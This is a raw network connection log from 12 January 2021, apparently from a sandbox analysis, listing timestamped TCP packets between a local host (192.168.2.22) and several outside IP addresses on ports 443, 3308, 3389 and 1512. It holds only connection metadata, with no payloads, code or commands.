Jan 12, 2021 07:43:29.577523947 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577601910 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577634096 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577724934 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577759027 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577855110 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577888012 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577939034 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577953100 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.577974081 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.577985048 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650163889 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650206089 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650218010 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650249004 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650338888 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650423050 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650449038 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650468111 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650535107 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650614023 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650670052 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650726080 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650773048 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650796890 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650840998 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.650876045 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.650921106 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651000977 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651057005 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651128054 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651180029 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651247025 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651292086 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651356936 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651408911 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651523113 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651576042 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651693106 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651711941 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651741982 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651770115 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651804924 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651848078 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.651915073 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.651962996 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652040958 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652085066 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652158022 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652205944 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652246952 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652292013 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652360916 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652409077 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652477980 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652522087 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652600050 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652646065 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652710915 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652760029 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652812958 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652848005 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.652916908 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.652950048 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653047085 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653086901 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653213978 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653249979 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653289080 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653321981 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653592110 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653614044 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653633118 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653662920 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653675079 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653759956 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653803110 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.653841972 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.653878927 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654007912 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654047966 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654124975 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654167891 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654292107 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654314041 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654335022 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654352903 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654407978 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654448032 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654522896 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654562950 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654663086 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654707909 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654769897 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654808998 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.654907942 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.654951096 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655009985 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655049086 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655083895 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655153990 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655206919 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655252934 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655328035 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655369043 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655445099 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655489922 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655514002 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655553102 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655642986 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655683041 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655771017 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655811071 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655878067 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.655920029 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.655994892 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656038046 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656120062 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656161070 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656234026 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656277895 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656409979 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656456947 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656523943 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656562090 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656599045 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656630993 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656702995 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656753063 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656775951 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656811953 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656883001 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.656920910 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.656992912 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657032967 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657131910 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657179117 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657246113 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657282114 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657371044 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657418013 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657485962 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657522917 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657604933 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657640934 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657710075 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657747030 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657855034 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.657891989 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.657974958 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.658016920 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.658040047 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.658073902 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.658163071 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.658179045 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:29.658199072 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.658216000 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.661525965 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.669080019 CET	49167	443	192.168.2.22	217.174.149.3
Jan 12, 2021 07:43:29.750328064 CET	443	49167	217.174.149.3	192.168.2.22
Jan 12, 2021 07:43:33.513964891 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:33.566016912 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:33.566121101 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:33.592195988 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:33.644181013 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:33.658950090 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:33.659054995 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:33.672101974 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:33.726475954 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:33.726547003 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.630913019 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.631139994 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.683146000 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:35.683324099 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.735280991 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:35.735308886 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:35.855621099 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:35.855648041 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:35.855818987 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.859977007 CET	49170	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:35.912023067 CET	443	49170	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:36.031012058 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.074269056 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.074393988 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.076164007 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.119187117 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.136204004 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.136240005 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.136332989 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.150428057 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.195276976 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.195519924 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.254049063 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.254236937 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.297214985 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.297415972 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.338068008 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.340488911 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.340524912 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.454628944 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.454665899 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.454927921 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.457690954 CET	49171	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:36.500921011 CET	3308	49171	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:36.623650074 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.677120924 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.677203894 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.678178072 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.731549025 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.749119043 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.749161959 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.749255896 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.749319077 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.756900072 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.814965963 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.815119028 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.820288897 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.820398092 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.873794079 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.873900890 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:36.912906885 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.927145958 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:36.927172899 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:37.016761065 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:37.016791105 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:37.017209053 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:37.020558119 CET	49172	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:37.074054003 CET	3389	49172	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:37.185718060 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.238770008 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.238852024 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.240626097 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.293281078 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.300317049 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.300343990 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.300437927 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.315670013 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.369586945 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.369772911 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.377355099 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.377485991 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.430195093 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.430403948 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.469463110 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.483405113 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.584259033 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.584301949 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.584496975 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.590713024 CET	49173	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:37.643493891 CET	1512	49173	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:37.704312086 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.758128881 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:37.758259058 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.759370089 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.811049938 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:37.826246977 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:37.826385975 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.836704016 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.890875101 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:37.891107082 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.902749062 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.902892113 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:37.954593897 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:37.954883099 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:38.006609917 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:38.126343966 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:38.126373053 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:38.126658916 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:38.132757902 CET	49174	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:43:38.184571028 CET	443	49174	77.220.64.37	192.168.2.22
Jan 12, 2021 07:43:38.252194881 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.295566082 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.295761108 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.297287941 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.340405941 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.350920916 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.350948095 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.351059914 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.366365910 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.411309004 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.411510944 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.420953989 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.421205997 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.464222908 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.464441061 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.504076958 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.507534027 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.507585049 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.621476889 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.621512890 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.621668100 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.625566959 CET	49175	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:43:38.668642998 CET	3308	49175	80.86.91.27	192.168.2.22
Jan 12, 2021 07:43:38.732944012 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.786592007 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:38.786700964 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.787703037 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.841453075 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:38.863671064 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:38.863696098 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:38.863801956 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.876291037 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.937833071 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:38.938123941 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.949721098 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:38.949851990 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:39.003976107 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.004302979 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:39.043183088 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.058064938 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.058105946 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.149585009 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.149620056 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.149775982 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:39.149835110 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:39.151963949 CET	49176	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:43:39.205807924 CET	3389	49176	5.100.228.233	192.168.2.22
Jan 12, 2021 07:43:39.265777111 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.318701982 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.318840027 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.320383072 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.374033928 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.380912066 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.380945921 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.381092072 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.389940023 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.444168091 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.444365025 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.457672119 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.458002090 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.510898113 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.511185884 CET	49177	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:43:39.549659967 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.563981056 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.662194014 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.662250042 CET	1512	49177	46.105.131.65	192.168.2.22
Jan 12, 2021 07:43:39.662483931 CET	49177	1512	192.168.2.22	46.105.131.65
